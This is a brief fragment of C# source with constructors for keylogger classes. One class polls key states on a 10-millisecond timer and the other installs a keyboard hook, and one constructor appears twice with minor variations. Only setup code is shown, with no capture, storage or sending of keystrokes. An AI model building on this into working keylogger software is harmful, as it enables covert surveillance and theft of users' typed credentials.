public KLG_Polling(Keylogger _klg) { for (int i = 0; i < a.Length; i++) { a[i] = false; } klg = _klg; this.timerKeyMine = new Timer(); this.timerKeyMine.Interval = 10; this.timerKeyMine.Tick += new System.EventHandler(this.timerKeyMine_Tick); this.timerKeyMine.Enabled = true; }
public KLG_Polling(Keylogger _klg) { for (int i = 0; i < a.Length; i++) a[i] = false; klg = _klg; this.timerKeyMine = new Timer(); this.timerKeyMine.Interval = 10; this.timerKeyMine.Tick += new System.EventHandler(this.timerKeyMine_Tick); this.timerKeyMine.Enabled = true; }
public KLG_Hooks(Keylogger _klg) { _hookID = SetHook(_proc); klg = _klg; }